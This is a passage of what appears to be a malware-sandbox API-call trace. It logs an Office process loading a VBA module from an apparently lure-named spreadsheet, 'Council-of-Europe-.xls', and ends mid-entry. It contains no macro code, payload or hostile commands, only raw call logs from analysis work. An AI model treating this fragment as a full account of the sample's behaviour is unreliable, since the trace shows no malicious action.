Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0155.375] RegCloseKey (hKey=0xca6) returned 0x0 [0155.375] RegCloseKey (hKey=0xc9e) returned 0x0 [0155.375] RegCloseKey (hKey=0xf76) returned 0x0 [0155.375] RegCloseKey (hKey=0xcd2) returned 0x0 [0155.375] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x1cf678*=0x0 | out: pptlib=0x1cf678*=0x9ab6a40) returned 0x0 [0155.439] IUnknown:QueryInterface (in: This=0x9ab6a40, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1cf478 | out: ppvObject=0x1cf478*=0x0) returned 0x80004002 [0155.439] ITypeLib:RemoteGetLibAttr (in: This=0x9ab6a40, ppTLibAttr=0x1cf470, pDummy=0x10 | out: ppTLibAttr=0x1cf470, pDummy=0x10) returned 0x0 [0155.439] ITypeLib:RemoteGetDocumentation (in: This=0x9ab6a40, index=-1, refPtrFlags=0x0, pbstrName=0x1cf468, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7f55546 | out: pbstrName=0x1cf468*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7f55546) returned 0x0 [0155.439] StringFromGUID2 (in: rguid=0x9c33410*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x1cf490, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0155.439] _ultow_s (in: _Value=0x2, _Buffer=0x1cf3da, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0155.439] _ultow_s (in: _Value=0x8, _Buffer=0x1cf3de, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0155.439] _ultow_s (in: _Value=0x0, _Buffer=0x1cf3e2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0155.439] wcscpy_s (in: _Destination=0x7e220a8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0155.439] wcscpy_s (in: _Destination=0x7e220ae, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0155.439] wcscpy_s (in: _Destination=0x7e220fa, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0155.439] wcscpy_s (in: _Destination=0x7e22108, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0155.439] wcscpy_s (in: _Destination=0x7e22188, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0155.440] ITypeLib:LocalReleaseTLibAttr (This=0x9ab6a40) returned 0x0 [0155.440] wcscpy_s (in: _Destination=0x7ae6330, _SizeInWords=0x104, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0155.440] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa13c120, cb=0xd00) returned 0xa14b690 [0155.440] wcscpy_s (in: _Destination=0xa14bc00, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0155.440] IMalloc:Free (This=0x7fefecb5380, pv=0x7ae6330) [0155.440] IUnknown:AddRef (This=0x9ab6a40) returned 0x2 [0155.440] IUnknown:QueryInterface (in: This=0x9ab6a40, riid=0x7fee51c85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1cf6d8 | out: ppvObject=0x1cf6d8*=0x0) returned 0x80004002 [0155.440] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="Office", lHashVal=0x107515, pfName=0x1cf890, pBstrLibName=0x1cf7c0 | out: pfName=0x1cf890*=0, pBstrLibName=0x1cf7c0) returned 0x0 [0155.440] IUnknown:Release (This=0x9ab6a40) returned 0x1 [0155.440] IMalloc:Alloc (This=0x7fefecb5380, cb=0x30) returned 0x7c56050 [0155.440] IMalloc:Free (This=0x7fefecb5380, pv=0x9bbd830) [0155.440] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9923b90 [0155.440] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9923b90, cb=0x5c) returned 0x96a18b0 [0155.440] IMalloc:Free (This=0x7fefecb5380, pv=0x7c56050) [0155.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x1cfa60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0155.442] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0155.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x1cfba0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0155.442] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0155.442] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa066550, cb=0x8) returned 0xa066e90 [0155.442] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93810 [0155.443] IMalloc:GetSize (This=0x7fefecb5380, pv=0x9c93810) returned 0x80 [0155.443] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac1450 [0155.443] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac1510 [0155.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x1cfa60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0155.443] CoCreateGuid (in: pguid=0x1cf790 | out: pguid=0x1cf790*(Data1=0x45000383, Data2=0x4699, Data3=0x4a4b, Data4=([0]=0xa4, [1]=0xa7, [2]=0xdb, [3]=0xcb, [4]=0x4a, [5]=0xbe, [6]=0xd8, [7]=0xe7))) returned 0x0 [0155.443] CoCreateGuid (in: pguid=0x1cf7a0 | out: pguid=0x1cf7a0*(Data1=0x254d1a93, Data2=0x2cc8, Data3=0x459f, Data4=([0]=0xaf, [1]=0x1, [2]=0xd5, [3]=0x44, [4]=0x11, [5]=0x1d, [6]=0xeb, [7]=0x68))) returned 0x0 [0155.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x1cf7b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0155.443] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0155.443] GetLocalTime (in: lpSystemTime=0x1cf688 | out: lpSystemTime=0x1cf688*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x3, wDay=0x8, wHour=0x14, wMinute=0x2e, wSecond=0x2d, wMilliseconds=0x354)) [0155.443] _ultow_s (in: _Value=0x6078a635, _Buffer=0xa14b97c, _BufferCount=0x9, _Radix=16 | out: _Buffer="6078a635") returned 0x0 [0155.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="016078a635", cchWideChar=11, lpMultiByteStr=0x1cf620, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="016078a635", lpUsedDefaultChar=0x0) returned 11 [0155.443] IMalloc:Alloc (This=0x7fefecb5380, cb=0x170) returned 0xa0ed020 [0155.443] IMalloc:Alloc (This=0x7fefecb5380, cb=0x50) returned 0x9bbd830 [0155.443] strcpy_s (in: _Dst=0x9808ab0, _DstSize=0x8, _Src="Module1" | out: _Dst="Module1") returned 0x0 [0155.443] IMalloc:Realloc (This=0x7fefecb5380, pv=0x248f930, cb=0x68) returned 0x969f0e0 [0155.443] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0155.443] wcscpy_s (in: _Destination=0xa14b990, _SizeInWords=0x8, _Source="Module1" | out: _Destination="Module1") returned 0x0 [0155.443] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0155.443] wcscpy_s (in: _Destination=0xa14b9a0, _SizeInWords=0x8, _Source="Module1" | out: _Destination="Module1") returned 0x0 [0155.443] IMalloc:Realloc (This=0x7fefecb5380, pv=0x248f920, cb=0x12) returned 0x78de6f0 [0155.443] IMalloc:Realloc (This=0x7fefecb5380, pv=0x248f940, cb=0x6) returned 0x248f920 [0155.443] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x3c) returned 0x5136d40 [0155.444] IMalloc:Free (This=0x7fefecb5380, pv=0x96a18b0) [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9923b90 [0155.444] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9923b90, cb=0x68) returned 0x96a18b0 [0155.444] IMalloc:Free (This=0x7fefecb5380, pv=0x5136d40) [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x3d0) returned 0xa199550 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9923b90 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x78de750 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c938a0 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0x248f940 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0x248f930 [0155.444] wcsncpy_s (in: _Destination=0x1cf770, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.444] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1cf6a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.444] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0155.444] CExposedStream::Seek () returned 0x0 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x688) returned 0x985bdf0 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93930 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x640) returned 0xa13c120 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9923c20 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066550 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066ea0 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9923b30 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c939c0 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x400) returned 0x95ee110 [0155.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x400) returned 0x95ee520 [0155.445] IMalloc:Alloc (This=0x7fefecb5380, cb=0x400) returned 0x7cf48a0 [0155.445] CExposedStream::AddRef () returned 0x2 [0155.445] CExposedStream::Read () returned 0x0 [0155.445] IMalloc:Alloc (This=0x7fefecb5380, cb=0x2028) returned 0xa1c9760 [0155.446] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10020*=0x10128) returned 0xa1cb790 [0155.447] CExposedStream::AddRef () returned 0x3 [0155.447] CExposedStream::Release () returned 0x2 [0155.447] IMalloc:Alloc (This=0x7fefecb5380, cb=0x2ee0) returned 0xa1db7c0 [0155.448] IMalloc:Alloc (This=0x7fefecb5380, cb=0x800) returned 0x99f0990 [0155.448] CExposedStream::Read () returned 0x0 [0155.448] CExposedStream::Read () returned 0x0 [0155.448] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0155.448] IMalloc:Alloc (This=0x7fefecb5380, cb=0x404) returned 0x7cf6100 [0155.448] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x80", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.448] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x81", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x82", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x83", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x84", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="…", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x86", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x87", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x88", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x89", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8a", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8b", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8c", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8d", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8e", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8f", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x90", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x91", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x92", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x93", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x94", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x95", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x96", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.449] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x97", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x98", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x99", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9a", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9b", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9c", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9d", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9e", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9f", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr=" ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¡", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¢", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="£", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¤", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¥", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¦", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="§", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¨", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="©", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ª", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="«", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¬", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="­", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="®", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¯", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="°", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="±", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="²", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.450] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="³", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="´", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="µ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¶", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="·", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¸", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¹", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="º", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="»", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¼", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="½", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¾", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¿", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="À", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Á", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Â", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ã", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ä", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Å", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Æ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ç", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="È", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="É", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ê", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ë", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ì", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.451] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Í", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Î", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ï", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ð", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ñ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ò", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ó", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ô", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Õ", 